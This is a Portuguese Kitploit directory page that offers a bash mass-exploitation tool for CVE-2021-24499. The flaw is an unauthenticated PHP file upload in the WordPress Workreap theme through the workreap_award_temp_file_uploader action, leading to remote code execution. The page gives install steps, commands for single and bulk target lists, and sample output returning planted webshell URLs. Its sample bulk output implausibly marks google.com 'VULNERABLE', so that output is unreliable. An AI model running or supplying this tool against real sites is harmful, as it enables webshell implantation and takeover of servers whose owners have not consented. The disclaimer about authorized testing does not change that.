Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-24499 — Tema WordPress Workreap 2.2.2 - Upload Não Autenticado Levando a Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/jayhutajulu1/cve-2021-24499
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubjayhutajulu1/cve-2021-24499

CVE-2021-24499

Tema WordPress Workreap 2.2.2 - Upload Não Autenticado Levando a Execução Remota de Código

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-24499 | Workreap - Tema WordPress de Marketplace Freelancer e Diretório < 2.2.2 - Upload Arbitrário de Arquivo

CVE License Shell

Tema WordPress Workreap 2.2.2 - Upload não autenticado de arquivo levando à Execução Remota de Código

Uma ferramenta de exploração em massa poderosa e precisa para a vulnerabilidade CVE-2021-24499 no tema WordPress Workreap. Esse exploit permite upload não autenticado de arquivos, o que pode levar à Execução Remota de Código (RCE).

📝 Descrição

CVE-2021-24499 é uma vulnerabilidade crítica no tema WordPress Workreap (versão 2.2.2 e anteriores) que permite que usuários não autenticados façam upload de arquivos arbitrários, incluindo arquivos PHP, através da ação AJAX workreap_award_temp_file_uploader. Isso pode levar à Execução Remota de Código (RCE) no servidor alvo.

Versões Vulneráveis: Todas as versões até e incluindo 2.2.2

Pontuação CVSS: Crítica

📦 Requisitos

  • Bash shell (Linux/macOS/WSL)
  • curl ferramenta de linha de comando
  • arquivo opts.php ou shell.php (webshell PHP)

🔧 Instalação

  1. Clone este repositório:
root@kitploit:~
git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
  1. Torne o script executável:
root@kitploit:~
chmod +x exploit.sh
  1. Certifique-se de ter opts.php ou shell.php no mesmo diretório (seu webshell PHP)

🚀 Uso

Uso Básico

Alvo Único:

root@kitploit:~
./exploit.sh -u http://target.com

Múltiplos Alvos (a partir de arquivo):

root@kitploit:~
./exploit.sh -l targets.txt

Mostrar Ajuda:

root@kitploit:~
./exploit.sh --help

Opções de Linha de Comando

OpçãoDescrição
-u URLExplora um único URL alvo
-l FILEExplora múltiplos alvos a partir de um arquivo (um URL por linha)
--helpMostra o menu de ajuda

Formato do Arquivo de Alvos

Crie um arquivo de texto com um URL por linha:

root@kitploit:~
http://target1.com
https://target2.com
http://target3.com

📸 Exemplos

Exemplo 1: Exploração de Alvo Único

root@kitploit:~
$ ./exploit.sh -u https://domain.com

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com/ >> VULNERABLE! 
 --> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php

Exemplo 2: Exploração em Massa

root@kitploit:~
$ ./exploit.sh -l targets.txt

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste autorizado.

  • NÃO use esta ferramenta em sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar
  • NÃO use esta ferramenta para atividades ilegais
  • Os autores e contribuidores NÃO são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta
  • Sempre certifique-se de ter a devida autorização antes de testar qualquer sistema
  • Use com responsabilidade e ética

Ao usar esta ferramenta, você concorda em usá-la apenas para fins legítimos de teste de segurança e pesquisa.

🔗 Referências

  • Exploit-DB
  • Wordfence
  • WP-Scan

👤 Créditos

Autor: Jay Maranatha Hutajulu

📄 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

🤝 Contribuindo

Contribuições, problemas e solicitações de recursos são bem-vindos! Sinta-se à vontade para verificar a página de issues.

⭐ Histórico de Estrelas

Se você achar esta ferramenta útil, considere dar uma estrela ⭐


Lembre-se: Sempre use ferramentas de segurança com responsabilidade e ética. Happy hacking! 🚀

Baixar ferramenta